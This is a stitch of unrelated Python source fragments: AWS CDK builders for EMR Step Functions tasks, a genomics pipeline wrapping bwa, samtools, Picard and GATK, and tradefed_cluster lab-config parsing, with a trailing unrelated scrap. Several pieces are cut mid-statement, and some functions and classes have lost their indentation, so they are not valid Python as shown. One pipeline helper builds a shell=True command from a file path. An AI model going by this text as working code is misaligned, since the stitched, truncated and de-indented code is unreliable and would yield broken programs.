    def build(scope: core.Construct, id: str, *,
              input_path: str = '$',
              output_path: Optional[str] = None,
              result_path: Optional[str] = None) -> sfn.Task:
        # Nest everything under one Construct so Lambda/Task ids cannot
        # collide with sibling constructs.
        nested = core.Construct(scope, id)

        tagger_fn = emr_lambdas.UpdateClusterTagsBuilder.get_or_build(nested)

        return sfn_tasks.LambdaInvoke(
            nested, 'Update Cluster Tags',
            output_path=output_path,
            result_path=result_path,
            lambda_function=tagger_fn,
            payload_response_only=True,
            payload=sfn.TaskInput.from_object({
                'ExecutionInput': sfn.TaskInput.from_context_at('$$.Execution.Input').value,
                'Input': sfn.TaskInput.from_data_at(input_path).value
            }),
        )
class CreateClusterBuilder:
    """Builds an EmrCreateClusterTask, optionally waiting for the cluster to start."""

    @staticmethod
    def build(scope: core.Construct, id: str, *,
              roles: emr_roles.EMRRoles,
              input_path: str = '$',
              result_path: Optional[str] = None,
              output_path: Optional[str] = None,
              wait_for_cluster_start: bool = True) -> sfn.Task:
        # Nest everything under one Construct so Lambda/Task ids cannot
        # collide with sibling constructs.
        nested = core.Construct(scope, id)

        # RUN_JOB blocks until the cluster is up; REQUEST_RESPONSE returns
        # immediately after the RunJobFlow call.
        if wait_for_cluster_start:
            pattern = sfn.IntegrationPattern.RUN_JOB
        else:
            pattern = sfn.IntegrationPattern.REQUEST_RESPONSE

        return EmrCreateClusterTask(
            nested, 'Start EMR Cluster',
            output_path=output_path,
            result_path=result_path,
            roles=roles,
            input_path=input_path,
            integration_pattern=pattern,
        )
class RunJobFlowBuilder(BaseBuilder):
@staticmethod
def build(scope: core.Construct, id: str, *, roles: emr_roles.EMRRoles,
kerberos_attributes_secret: Optional[secretsmanager.Secret] = None,
secret_configurations: Optional[Dict[str, secretsmanager.Secret]] = None,
input_path: str = '$',
result_path: Optional[str] = None,
output_path: Optional[str] = None,
wait_for_cluster_start: bool = True) -> sfn.Task:
# We use a nested Construct to avoid collisions with Lambda and Task ids
construct = core.Construct(scope, id)
event_rule = core.Stack.of(scope).node.try_find_child('EventRule')
if event_rule is None:
event_rule = events.Rule(
construct, 'EventRule',
enabled=False,
schedule=events.Schedule.rate(core.Duration.minutes(1)))
BaseBuilder.tag_construct(event_rule)
run_job_flow_lambda = emr_lambdas.RunJobFlowBuilder.get_or_build(construct, roles, event_rule)
check_cluster_status_lambda = emr_lambdas.CheckClusterStatusBuilder.get_or_build(construct, event_rule)
if kerberos_attributes_secret:
run_job_flow_lambda.add_to_role_policy(iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=['secretsmanager:GetSecretValue'],
resources=[f'{kerberos_attributes_secret.secret_arn}*']
))
if secret_configurations is not None:
for secret in secret_configurations.values():
run_job_flow_lambda.add_to_role_policy(iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=['secretsmanager:GetSecretValue'],
resources=[f'{secret.secret_arn}*']
))
return sfn_tasks.LambdaInvoke(
construct, 'Start EMR Cluster (with Secrets)',
output_path=output_path,
result_path=result_path,
lambda_function=run_job_flow_lambda,
integration_pattern=sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN,
payload=sfn.TaskInput.from_object({
'ExecutionInput': sfn.TaskInput.from_context_at('$$.Execution.Input').value,
| |
<reponame>marcelcaraciolo/nextgen-pipeline
'''
All pipeline commands for NextGen Sequencing Pipeline (NGS)
'''
import sys
import os
from utils import runCommand, splitPath
import subprocess
def make_metadata_string(metadata):
    """Format a bwa `-r` read-group header argument from read-group metadata.

    `metadata` must provide the 'ID', 'LB', 'SM' and 'PL' keys.
    """
    fields = (metadata['ID'], metadata['LB'], metadata['SM'], metadata['PL'])
    return r'-r "@RG\tID:%s\tLB:%s\tSM:%s\tPL:%s"' % fields
def make_reference_database(command, algorithm, reference):
    '''
    Create the bwa reference database unless it already exists.

    Returns the path of the .bwt database file either way.
    '''
    ref_database = reference + '.bwt'
    if not os.path.exists(ref_database):
        build_cmd = command % {'algorithm': algorithm, 'prefix': reference,
                               'seq': reference + '.fasta'}
        runCommand('Creating Reference Database', build_cmd)
    else:
        print('Reference database already exists: using %s' % ref_database)
    return ref_database
def index_reference(reference):
    """Verify that the reference's .fasta.fai index exists; abort the run if not."""
    reference_index = reference + '.fasta.fai'
    if not os.path.exists(reference_index):
        sys.exit('check if the bwa index ran successfully')
    print('Reflist already exists: using %s' % reference_index)
def fastqc(command, sequences, fastq_metadata, output_dir):
    '''
    Run FastQC on each fastq file.

    `command` is a template with %(outdir)s and %(seq)s placeholders.
    Fixed: the original overwrote the template with the formatted string on
    the first iteration, so every subsequent file was interpolated against
    an already-expanded command instead of the template.
    '''
    for fastq_file in sequences:
        cmd = command % {'outdir': output_dir, 'seq': fastq_file}
        runCommand('Checking fastq quality', cmd)
def can_pipe(command, fastq_file):
    '''
    bwa-mem handles longer (> 70bp) reads with improved piping.
    Randomly samples 5000 reads from the first two million.
    Default to no piping if more than 75% of the sampled reads are small.

    Returns True when piping is safe (<= 75% of sampled reads shorter than 70bp).
    Raises IOError if the sampling pipeline produced no output.
    '''
    min_size = 70
    thresh = 0.75
    head_count = 8000000          # 2M reads * 4 fastq lines per read
    tocheck = 5000
    cat_cmd = 'cat {fastq_file}'
    cmd = (cat_cmd + " | head -n {head_count} | "
           "{command} sample -s42 - {tocheck} | "
           "awk '{{if(NR%4==2) print length($1)}}' | sort | uniq -c")
    # Fixed: universal_newlines=True makes check_output return text on
    # Python 3 (it otherwise returns bytes, breaking the str splitting
    # below); subprocess.DEVNULL avoids leaking the /dev/null file handle.
    count_out = subprocess.check_output(cmd.format(**locals()), shell=True,
                                        executable="/bin/bash",
                                        stderr=subprocess.DEVNULL,
                                        universal_newlines=True)
    if not count_out.strip():
        raise IOError("Failed to check fastq file sizes with: %s" % cmd.format(**locals()))
    shorter = 0
    for count, size in (l.strip().split() for l in count_out.strip().split("\n")):
        if int(size) < min_size:
            shorter += int(count)
    return (float(shorter) / float(tocheck)) <= thresh
def align_with_mem(command, threads, reference, fastq_file, pair_file, fastq_metadata, output_dir):
    '''
    Perform alignment on two paired-end fastq files to a reference genome to produce a sam file.
    '''
    ext = splitPath(fastq_file)[2]
    pair_ext = splitPath(pair_file)[2]
    if ext != '.fastq' or pair_ext != '.fastq':
        sys.exit('align: one of the fastq file %s or %s does not have .fastq extension' % (fastq_file, pair_file))

    fastq_name = os.path.basename(fastq_file)
    sam_file = os.path.join(output_dir, os.path.splitext(fastq_name)[0]) + '.sam'

    # Read group: both LB and ID use the identifier_sample_run_lane string.
    meta = fastq_metadata[fastq_name]
    sample = meta['sample']
    read_group = '%s_%s_%s_Lane%s' % (meta['identifier'], sample, meta['run_id'], meta['lane'])
    metadata_str = make_metadata_string(
        {'PL': 'ILLUMINA', 'SM': sample, 'LB': read_group, 'ID': read_group})

    runCommand('bwa mem alignment from fastq: %s' % sample,
               command % {'threads': threads, 'meta': metadata_str, 'ref': reference,
                          'seq': fastq_file, 'pair': pair_file, 'out': sam_file})
    return sam_file
def align(command, threads, reference, sequence, fastq_metadata, output_dir):
    '''
    Align sequence reads to the reference genome. This is the bwa's first stage, bwa aln.
    '''
    _, name, ext = splitPath(sequence)
    if ext != '.fastq':
        sys.exit('align: sequence file %s does not have .fastq extension' % sequence)

    alignment_file = os.path.join(output_dir, name + '.sai')
    runCommand('Running Alignment',
               command % {'out': alignment_file, 'threads': int(threads), 'ref': reference,
                          'seq': sequence, 'encodingflag': ''})
    return alignment_file
def alignPE2sam(command, reference, fastq_file, pair_file, sai_fastq_file, sai_pair_file,
                fastq_metadata, output_dir):
    '''
    Convert alignments to SAM format. Turn bwa sai alignments into a sam file.
    It uses bwa sampe commandline. (Pair End only)
    '''
    ext = splitPath(sai_fastq_file)[2]
    pair_ext = splitPath(sai_pair_file)[2]
    if ext != '.sai' or pair_ext != '.sai':
        sys.exit('alignPE2sam: one .sai file %s or %s does not have .sai extension' % (sai_fastq_file, sai_pair_file))

    fastq_name = os.path.basename(fastq_file)
    sam_file = os.path.join(output_dir, os.path.splitext(fastq_name)[0]) + '.sam'

    # Read group: both LB and ID use the identifier_sample_run_lane string.
    meta = fastq_metadata[fastq_name]
    sample = meta['sample']
    read_group = '%s_%s_%s_Lane%s' % (meta['identifier'], sample, meta['run_id'], meta['lane'])
    metadata_str = make_metadata_string(
        {'PL': 'ILLUMINA', 'SM': sample, 'LB': read_group, 'ID': read_group})

    runCommand('bwa sampe alignment from fastq: %s' % sample,
               command % {'meta': metadata_str, 'ref': reference, 'align': sai_fastq_file,
                          'alignP': sai_pair_file, 'seq': fastq_file, 'pair': pair_file,
                          'out': sam_file})
    return sam_file
def align2sam(command, reference, fastq_file, sai_fastq_file, fastq_metadata, output_dir):
"""
Convert alignments to SAM format. Turn bwa sai alignments into a sam file.
It uses bwa samse commandline.
"""
(path, name, ext) = splitPath(sai_fastq_file)
if ext != '.sai':
sys.exit('align2Sam: alignment file %s does not have .sai extension' % sai_fastq_file)
sam_file = os.path.join(output_dir, os.path.splitext(os.path.basename(fastq_file))[0]) + '.sam'
sample = fastq_metadata[os.path.basename(fastq_file)]['sample']
run_id = fastq_metadata[os.path.basename(fastq_file)]['run_id']
lane = fastq_metadata[os.path.basename(fastq_file)]['lane']
identifier = fastq_metadata[os.path.basename(fastq_file)]['identifier']
readgroup_metadata = {'PL': 'ILLUMINA', 'SM': sample,
'LB': '%s_%s_%s_Lane%s' % (identifier, sample, run_id, lane),
'ID': '%s_%s_%s_Lane%s' % (identifier, sample, run_id, lane) }
metadata_str = make_metadata_string(readgroup_metadata)
command = command % {'out': sam_file, 'ref': reference, 'align': sai_fastq_file,
'seq': fastq_file, 'meta': metadata_str}
runCommand('bwa samse alignment from fastq: %s' % sample, command)
return sam_file
def samP2bam(command, command_options, piccard_dir, alignment, output_dir):
    """
    Convert sam to bam and sort, using Picard.
    """
    _, name, ext = splitPath(alignment)
    # Second element of command_options carries the JVM options.
    jvm_options = command_options[1]
    if ext != '.sam':
        sys.exit('sam2bam: alignment file %s does not have .sam extension' % alignment)

    bam_file = os.path.join(output_dir, name + '.bam')
    runCommand('Sam to Sorted Bam',
               command % {'out': bam_file, 'sam': alignment,
                          'jvmoptions': jvm_options, 'picarddir': piccard_dir})
    return bam_file
def samS2bam(command, command_options, threads, alignment, output_dir):
    """
    Convert sam to bam and sort, using Samtools.
    """
    _, name, ext = splitPath(alignment)
    if ext != '.sam':
        sys.exit('sam2Sbam: alignment file %s does not have .sam extension' % alignment)

    # samtools sort appends '.bam' to the given output prefix itself.
    bam_prefix = os.path.join(output_dir, name)
    runCommand('Sam to Sorted Bam',
               command % {'out': bam_prefix, 'sam': alignment,
                          'max_mem': command_options, 'threads': threads})
    return bam_prefix + '.bam'
def indexbam(command, alignment, output_dir):
    '''
    Index alignment file (.bam) using Samtools
    '''
    (path, name, ext) = splitPath(alignment)
    if ext != '.bam':
        sys.exit('indexbam: alignment file %s does not have .bam extension' % alignment)
    cmd = command % {'bam': alignment}
    runCommand('Indexing alignment file', cmd)
    # Fixed: `print command` was Python 2 statement syntax (a SyntaxError on
    # Python 3, where this file's other prints already use call syntax).
    print(cmd)
    index_file = os.path.join(output_dir, name.replace('.bam', '.bai'))
    # NOTE(review): if splitPath strips the extension, the .replace above is
    # a no-op and the returned path has no '.bai' suffix — confirm against
    # splitPath and the actual samtools index output name.
    return index_file
def dedup(command, command_options, piccard_dir, alignment, output_dir):
    """
    Remove apparent duplicates using Picard MarkDuplicates
    """
    _, name, ext = splitPath(alignment)
    # Second element of command_options carries the JVM options.
    jvm_options = command_options[1]
    if ext != '.bam':
        sys.exit('mark pcr duplicates: alignment file %s does not have .bam extension' % alignment)

    marked_bam_file = os.path.join(output_dir, name + '.marked.bam')
    runCommand('Marking PCR duplicates',
               command % {'out': marked_bam_file, 'bam': alignment,
                          'jvmoptions': jvm_options, 'picarddir': piccard_dir,
                          'log': 'metrics'})
    return marked_bam_file
def realign_intervals(command, command_options, gatk_dir, reference, alignment, output_dir):
    """
    Run GATK RealignTargetCreator to find suspect intervals for realignment.
    """
    (path, name, ext) = splitPath(alignment)
    command_options = command_options[1]
    if not alignment.endswith('marked.bam'):
        # Fixed: the message claimed a missing '.bam' extension, but the
        # check is for the '.marked.bam' suffix produced by dedup().
        sys.exit('calculating realignment intervals: alignment file %s does not have .marked.bam extension' % alignment)
    interval_file = os.path.join(output_dir, name + '.bam.list')
    command = command % {'out': interval_file, 'bam': alignment, 'jvmoptions': command_options, \
                         'gatkdir': gatk_dir, 'ref': reference + '.fasta'}
    runCommand('Calculating realignment intervals', command)
    return interval_file
def realign(command, command_options, gatk_dir, reference, alignment, intervals, output_dir):
    '''
    Run GATK IndelRealigner for local realignment, using intervals found by realign_intervals
    '''
    (path, name, ext) = splitPath(alignment)
    command_options = command_options[1]
    if not intervals.endswith('bam.list') or ext != '.bam':
        # Fixed: the message described the intervals file but interpolated
        # the alignment path.
        sys.exit('local realignment with intervals: intervals file %s does not have .list extension' % intervals)
    realigned_bam = os.path.join(output_dir, name + '.realigned.bam')
    command = command % {'jvmoptions': command_options, 'ref': reference + '.fasta', 'out': realigned_bam,
                         'bam': alignment, 'gatkdir': gatk_dir, 'intervals': intervals}
    runCommand('Running local realignment around indels', command)
    return realigned_bam
def fix_mate(command, command_options, piccard_dir, alignment, output_dir):
    '''
    Fix mate information in paired end data using picard
    '''
    _, name, ext = splitPath(alignment)
    # Second element of command_options carries the JVM options.
    jvm_options = command_options[1]
    if ext != '.bam':
        sys.exit('mate information fix: alignment file %s does not have .bam extension' % alignment)

    fixed_bam = os.path.join(output_dir, name + '.fixed.bam')
    runCommand('Fixing Mate information',
               command % {'jvmoptions': jvm_options, 'out': fixed_bam,
                          'bam': alignment, 'picarddir': piccard_dir})
    return fixed_bam
def base_qual_recal_count(command, command_options, gatk_dir, reference, dbsnp, alignment, output_dir):
    '''
    GATK CountCovariates, first step of base quality score recalibration.
    '''
    _, name, ext = splitPath(alignment)
    # Second element of command_options carries the JVM options.
    jvm_options = command_options[1]
    if ext != '.bam':
        sys.exit('count covariates: alignment file %s does not have .bam extension' % alignment)

    recal_file = os.path.join(output_dir, name + '.recal_data.csv')
    runCommand('count covariates for base quality score',
               command % {'jvmoptions': jvm_options, 'out': recal_file, 'dbsnp': dbsnp,
                          'bam': alignment, 'gatkdir': gatk_dir, 'ref': reference + '.fasta'})
    return recal_file
def base_qual_recal_tabulate(command, command_options, gatk_dir, reference, recal_file, alignment, output_dir):
'''
GATK TableRecalibration: recalibrate base quality scores using the output of CountCovariates.
'''
(path, name, ext) = splitPath(alignment)
command_options = command_options[1]
if ext != '.bam':
sys.exit('table recalibration: alignment file %s does not have .bam extension' % alignment)
recal_bam = os.path.join(output_dir, name + '.recal.bam')
command = command % {'jvmoptions': command_options, 'out': recal_bam, 'recalfile': | |
<reponame>maksonlee/tradefed_cluster
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tools for tradefed satellite lab configs."""
import collections
import itertools
import logging
import os
import six
import strictyaml as syaml
try:
from google.protobuf import json_format
except ImportError:
from google3.net.proto2.python.public import json_format
from tradefed_cluster.configs import lab_config_pb2
logger = logging.getLogger(__name__)
_DEFAULT_SHUTDOWN_TIMEOUT_SEC = 3600
class ConfigError(Exception):
  """Raised when a lab config cannot be parsed or validated."""
def _ProtoDescriptorToSchema(pb_descriptor):
  """Convert a proto Descriptor to a strictyaml schema."""
  schema_map = {}
  for field in pb_descriptor.fields:
    field_schema = _ProtoFieldToSchema(field)
    # Repeated fields map to YAML sequences of the element schema.
    if field.label == field.LABEL_REPEATED:
      field_schema = syaml.Seq(field_schema)
    schema_map[syaml.Optional(field.name)] = field_schema
  return syaml.Map(schema_map)
def _ProtoFieldToSchema(field):
  """Convert a Proto Field to strictyaml schema."""
  ftype = field.type
  if ftype == field.TYPE_STRING:
    return syaml.Str()
  if ftype == field.TYPE_BOOL:
    return syaml.Bool()
  integer_types = (field.TYPE_INT32, field.TYPE_UINT32,
                   field.TYPE_INT64, field.TYPE_UINT64)
  if ftype in integer_types:
    return syaml.Int()
  if ftype in (field.TYPE_DOUBLE, field.TYPE_FLOAT):
    return syaml.Decimal()
  if ftype == field.TYPE_MESSAGE:
    # Nested messages become nested maps.
    return _ProtoDescriptorToSchema(field.message_type)
  if ftype == field.TYPE_ENUM:
    # Enum values are accepted by their string names.
    return syaml.Str()
  raise ConfigError('Unknown field type in lab_config_pb2: %r.' % ftype)
# Validation schema for lab config YAML files, derived once at import time
# from the LabConfig proto message definition.
_YAML_SCHEMA = _ProtoDescriptorToSchema(lab_config_pb2.LabConfig.DESCRIPTOR)
def Parse(yaml_file_obj):
  """Parse yaml config.

  Args:
    yaml_file_obj: yaml file obj.

  Returns:
    a lab_config_pb2.LabConfig proto.

  Raises:
    ConfigError: if the config is incorrect.
  """
  content = six.ensure_str(yaml_file_obj.read())
  # Validate against the proto-derived schema, then load the resulting dict
  # into the proto; either step failing becomes a ConfigError.
  try:
    parsed = syaml.dirty_load(
        content, schema=_YAML_SCHEMA, allow_flow_style=True).data
  except (syaml.YAMLError, TypeError) as e:
    raise ConfigError(e)
  try:
    return json_format.ParseDict(parsed, lab_config_pb2.LabConfig())
  except json_format.ParseError as e:
    raise ConfigError(e)
class HostConfig(object):
    """A host config object.

    Layers the host-, cluster- and lab-level protos for one host; most
    properties resolve with host -> cluster -> lab fallback.
    This class is immutable. The setter functions return a new HostConfig
    object.
    """

    def __init__(
        self,
        host_config_pb,
        cluster_config_pb,
        lab_config_pb):
        # Defensive copies keep this object immutable even if the caller
        # later mutates the protos it passed in.
        self.host_config_pb = lab_config_pb2.HostConfig()
        self.cluster_config_pb = lab_config_pb2.ClusterConfig()
        self.lab_config_pb = lab_config_pb2.LabConfig()
        self.host_config_pb.CopyFrom(host_config_pb)
        self.cluster_config_pb.CopyFrom(cluster_config_pb)
        self.lab_config_pb.CopyFrom(lab_config_pb)

    def Copy(self):
        """Copy the host config."""
        return HostConfig(self.host_config_pb,
                          self.cluster_config_pb,
                          self.lab_config_pb)

    @property
    def hostname(self):
        """Get host's name."""
        return self.host_config_pb.hostname

    @property
    def host_login_name(self):
        """Get host's login username (host -> cluster -> lab fallback)."""
        return (self.host_config_pb.host_login_name or
                self.cluster_config_pb.host_login_name or
                self.lab_config_pb.host_login_name)

    @property
    def tf_global_config_path(self):
        """Get tf global config for the host (host -> cluster fallback)."""
        return (self.host_config_pb.tf_global_config_path or
                self.cluster_config_pb.tf_global_config_path)

    @property
    def lab_name(self):
        """Get host's lab's name."""
        return self.lab_config_pb.lab_name

    @property
    def cluster_name(self):
        """Get host's cluster's name."""
        return self.cluster_config_pb.cluster_name

    @property
    def control_server_url(self):
        """Get the master server the host connect to."""
        # TODO: Deprecated, use control_server_url instead.
        # Prefers the new control_server_url fields over the legacy
        # master_url ones, cluster level before lab level.
        return (self.cluster_config_pb.control_server_url or
                self.cluster_config_pb.master_url or
                self.lab_config_pb.control_server_url or
                self.lab_config_pb.master_url)

    @property
    def operation_mode(self):
        """Get the operation mode of the host."""
        return self.lab_config_pb.operation_mode

    @property
    def docker_image(self):
        """Get the docker image the host to use (host -> cluster -> lab)."""
        return (self.host_config_pb.docker_image or
                self.cluster_config_pb.docker_image or
                self.lab_config_pb.docker_image)

    def SetDockerImage(self, val):
        """Create a new config with given value of docker_image."""
        host_config = self.Copy()
        host_config.host_config_pb.docker_image = val
        return host_config

    @property
    def graceful_shutdown(self):
        """Graceful shutdown or not."""
        return self.cluster_config_pb.graceful_shutdown or False

    @property
    def shutdown_timeout_sec(self):
        """The dockerized TradeFed shutdown timeouts in seconds."""
        return self.cluster_config_pb.shutdown_timeout_sec

    @property
    def enable_stackdriver(self):
        """Enable stackdriver logging and monitor."""
        return (self.cluster_config_pb.enable_stackdriver or
                self.lab_config_pb.enable_stackdriver or
                False)

    @property
    def enable_autoupdate(self):
        """Enable autoupdate mtt daemon process."""
        return (self.host_config_pb.enable_autoupdate or
                self.cluster_config_pb.enable_autoupdate or
                self.lab_config_pb.enable_autoupdate)

    @property
    def extra_docker_args(self):
        """Extra docker args (cluster-level args first, then host-level)."""
        return (list(self.cluster_config_pb.extra_docker_args or []) +
                list(self.host_config_pb.extra_docker_args or []))

    @property
    def service_account_json_key_path(self):
        """The file path of service account json key."""
        return self.lab_config_pb.service_account_json_key_path

    @property
    def docker_server(self):
        """Get the docker server the image is hosted on."""
        return (self.host_config_pb.docker_server or
                self.cluster_config_pb.docker_server or
                self.lab_config_pb.docker_server)

    @property
    def secret_project_id(self):
        """Get secret project id."""
        return self.lab_config_pb.secret_project_id

    @property
    def service_account_key_secret_id(self):
        """Get secret id for service account key."""
        return self.lab_config_pb.service_account_key_secret_id

    @property
    def service_account(self):
        """Get service account."""
        return self.lab_config_pb.service_account

    def SetServiceAccountJsonKeyPath(self, val):
        """Create a new config with given value of service_account_json_key_path."""
        host_config = self.Copy()
        host_config.lab_config_pb.service_account_json_key_path = val
        return host_config

    @property
    def tmpfs_configs(self):
        """Get tmpfs configs to mount into the container.

        Return the tmpfs configs merged the tmpfs configs for the cluster and
        the host. If the path of the tmpfs configs are the same, pick the one
        from the host config.

        Returns:
            a list of tmpfs configs.
        """
        # Host entries are inserted last so they overwrite cluster entries
        # that share the same mount path.
        path_to_tmpfs = collections.OrderedDict()
        for tmpfs_config in self.cluster_config_pb.tmpfs_configs or []:
            path_to_tmpfs[tmpfs_config.path] = tmpfs_config
        for tmpfs_config in self.host_config_pb.tmpfs_configs or []:
            path_to_tmpfs[tmpfs_config.path] = tmpfs_config
        return list(path_to_tmpfs.values())

    @property
    def enable_ui_update(self):
        """Whether host update from UI is enabled."""
        return bool(self.host_config_pb.enable_ui_update or
                    self.cluster_config_pb.enable_ui_update or
                    self.lab_config_pb.enable_ui_update)

    @property
    def owners(self):
        """Inherit the owners field from parent cluster or lab."""
        # Deduplicated union; note that set() makes the result order
        # unspecified.
        return list(set(owner for owner in itertools.chain(
            self.cluster_config_pb.owners, self.lab_config_pb.owners)))

    @property
    def engprod_api_key(self):
        """API Key for Android Engprod API discovery."""
        return self.lab_config_pb.engprod_api_key

    @property
    def inventory_groups(self):
        """Get the host's inventory groups."""
        return self.host_config_pb.inventory_groups

    @property
    def max_local_virtual_devices(self):
        """Get the maximum number of local virtual devices on the host."""
        return self.host_config_pb.max_local_virtual_devices

    @property
    def ssh_arg(self):
        """Get host's ssh arg."""
        return self.lab_config_pb.ssh_arg

    def Save(self, output_file_path):
        """Save the config to a file.

        Writes a YAML LabConfig document containing only this host, nested
        inside copies of its cluster and lab configs with sibling hosts and
        clusters stripped out.
        """
        lab_config_pb = lab_config_pb2.LabConfig()
        lab_config_pb.CopyFrom(self.lab_config_pb)
        del lab_config_pb.cluster_configs[:]
        cluster_config_pb = lab_config_pb2.ClusterConfig()
        cluster_config_pb.CopyFrom(self.cluster_config_pb)
        del cluster_config_pb.host_configs[:]
        cluster_config_pb.host_configs.add().CopyFrom(self.host_config_pb)
        lab_config_pb.cluster_configs.add().CopyFrom(cluster_config_pb)
        with open(output_file_path, 'w') as f:
            lab_config_dict = json_format.MessageToDict(
                lab_config_pb,
                preserving_proto_field_name=True)
            f.write(syaml.as_document(lab_config_dict, schema=_YAML_SCHEMA).as_yaml())

    def __eq__(self, other):
        """Equal when every public property resolves to the same value."""
        if not isinstance(other, HostConfig):
            return False
        property_names = [name for name, obj
                          in vars(HostConfig).items()
                          if isinstance(obj, property)]
        return all(getattr(self, property_name) == getattr(other, property_name)
                   for property_name in property_names)

    def __repr__(self):
        """One 'name: value' line per public property."""
        lines = []
        for name, obj in vars(HostConfig).items():
            if not isinstance(obj, property):
                continue
            lines.append('%s: %s' % (name, getattr(self, name)))
        return '\n'.join(lines)
def CreateHostConfig(
    lab_name=None,
    cluster_name=None,
    hostname=None,
    host_login_name=None,
    tf_global_config_path=None,
    tmpfs_configs=None,
    docker_image=None,
    graceful_shutdown=False,
    shutdown_timeout_sec=_DEFAULT_SHUTDOWN_TIMEOUT_SEC,
    enable_stackdriver=False,
    enable_autoupdate=False,
    service_account_json_key_path=None,
    docker_server=None,
    extra_docker_args=(),
    control_server_url=None,
    secret_project_id=None,
    service_account_key_secret_id=None,
    service_account=None,
    enable_ui_update=None,
    engprod_api_key=None,
    ssh_arg=None,
    operation_mode=None,
    max_local_virtual_devices=None,
    ):
    """Create a host config from raw data.

    Args:
        lab_name: lab name.
        cluster_name: cluster name.
        hostname: hostname.
        host_login_name: user name to login.
        tf_global_config_path: tf global config path.
        tmpfs_configs: a list of TmpfsConfig proto.
        docker_image: the docker image to use.
        graceful_shutdown: graceful shutdown the host or not.
        shutdown_timeout_sec: int, the dockerized TF shutdown timeout.
        enable_stackdriver: enable stackdriver monitor or not.
        enable_autoupdate: enable auto-update daemon or not.
        service_account_json_key_path: string or None, the file path of service
            account json key.
        docker_server: the docker server that hosts the image.
        extra_docker_args: extra docker args to pass to docker container.
        control_server_url: the control server the host connect to.
        secret_project_id: Google Cloud Project for storing secret.
        service_account_key_secret_id: Secret id for service account key.
        service_account: Service account for the lab.
        enable_ui_update: bool, whether host update from UI is enabled.
        engprod_api_key: string, API Key for Android Engprod API discovery.
        ssh_arg: string, ssh args to the host.
        operation_mode: string, host operation mode.
        max_local_virtual_devices: int, maximum number of virtual devices

    Returns:
        a HostConfig have all those data.
    """
    # Host-level proto: settings that apply to this machine only.
    # Note docker_image is set on both the host and cluster protos.
    host_config_pb = lab_config_pb2.HostConfig(
        hostname=hostname,
        tf_global_config_path=tf_global_config_path,
        tmpfs_configs=tmpfs_configs,
        enable_autoupdate=enable_autoupdate,
        docker_image=docker_image,
        docker_server=docker_server,
        extra_docker_args=list(extra_docker_args),
        enable_ui_update=enable_ui_update,
        max_local_virtual_devices=max_local_virtual_devices,)
    # Cluster-level proto wrapping the single host above.
    cluster_config_pb = lab_config_pb2.ClusterConfig(
        cluster_name=cluster_name,
        host_login_name=host_login_name,
        host_configs=[host_config_pb],
        docker_image=docker_image,
        graceful_shutdown=graceful_shutdown,
        shutdown_timeout_sec=shutdown_timeout_sec,
        enable_stackdriver=enable_stackdriver,
        control_server_url=control_server_url)
    # Lab-level proto wrapping the single cluster above.
    lab_config_pb = lab_config_pb2.LabConfig(
        lab_name=lab_name,
        cluster_configs=[cluster_config_pb],
        docker_server=docker_server,
        service_account_json_key_path=service_account_json_key_path,
        secret_project_id=secret_project_id,
        service_account_key_secret_id=service_account_key_secret_id,
        service_account=service_account,
        engprod_api_key=engprod_api_key,
        ssh_arg=ssh_arg,
        operation_mode=operation_mode)
    return HostConfig(host_config_pb, cluster_config_pb, lab_config_pb)
def CreateTmpfsConfig(path, size, mode):
    """Build a TmpfsConfig proto from its three raw fields."""
    fields = {'path': path, 'size': size, 'mode': mode}
    return lab_config_pb2.TmpfsConfig(**fields)
def IsYaml(path):
    """Return True when the path names a YAML (.yaml) config file."""
    suffix = '.yaml'
    return path[-len(suffix):] == suffix
def LocalFileEnumerator(root_path, filename_filter=None):
    """Enumerate files from a local path.

    Visits ``root_path`` breadth-first: a plain file is yielded directly
    (subject to ``filename_filter``); a directory is expanded and all files
    under it are queued.

    Args:
        root_path: the root of all configs; may be a file or a directory.
        filename_filter: only return files that match the filter.

    Yields:
        a file like obj (opened in text mode).

    Raises:
        ConfigError: raise if the config path doesn't exist.
    """
    logger.debug('Get file from root %s.', root_path)
    if not root_path:
        return
    # FIFO work queue; deque gives O(1) pops from the left where
    # list.pop(0) is O(n).
    paths = collections.deque([root_path])
    while paths:
        path = paths.popleft()
        if not os.path.exists(path):
            raise ConfigError('%s doesn\'t exist.' % path)
        if os.path.isfile(path):
            if filename_filter and not filename_filter(path):
                continue
            logger.debug('Read from %s.', path)
            with open(path, 'r') as file_obj:
                # The file stays open while the consumer holds it; it is
                # closed when the generator resumes.
                yield file_obj
        else:
            for root, _, filenames in os.walk(path):
                for filename in filenames:
                    paths.append(os.path.join(root, filename))
class LabConfigPool(object):
"""A config pool that can query configs for host and cluster."""
    def __init__(self, file_enumerator=None):
        """Create a pool backed by an iterable of config file objects.

        Args:
            file_enumerator: iterable yielding file-like objects to parse;
                None means no lab config is configured.
        """
        self.file_enumerator = file_enumerator
        # Lookup indexes, populated by LoadConfigs()/_LoadConfig().
        self._lab_to_lab_config_pb = {}
        self._cluster_to_cluster_config_pb = {}
        self._cluster_to_lab_config_pb = {}
        self._host_to_host_config = {}
        self._cluster_to_host_configs = collections.defaultdict(list)
        self._all_host_configs = []
def LoadConfigs(self):
"""Load configs in the given path."""
if not self.file_enumerator:
logging.debug('Lab config is not set.')
return
has_config = False
for file_obj in self.file_enumerator:
has_config = True
self._LoadConfig(file_obj)
if not has_config:
raise ConfigError(
'Lab config path is set, '
'but there is no lab config files under the path.')
if len(self._lab_to_lab_config_pb.keys()) > 1:
raise ConfigError(
'There are multiple labs configured: %s.' %
self._lab_to_lab_config_pb.keys())
def _LoadConfig(self, file_obj):
"""Load one config file."""
lab_config_pb = Parse(file_obj)
self._lab_to_lab_config_pb[lab_config_pb.lab_name] = lab_config_pb
for cluster_config_pb in lab_config_pb.cluster_configs:
self._cluster_to_cluster_config_pb[cluster_config_pb.cluster_name] = (
cluster_config_pb)
self._cluster_to_lab_config_pb[cluster_config_pb.cluster_name] = (
lab_config_pb)
for host_config_pb | |
for i, cl in enumerate(cluster_inds):
if not cl in clusters: clusters[cl] = []
clusters[cl].append(i)
new_stmts = [None for _ in range(len(exprs))]
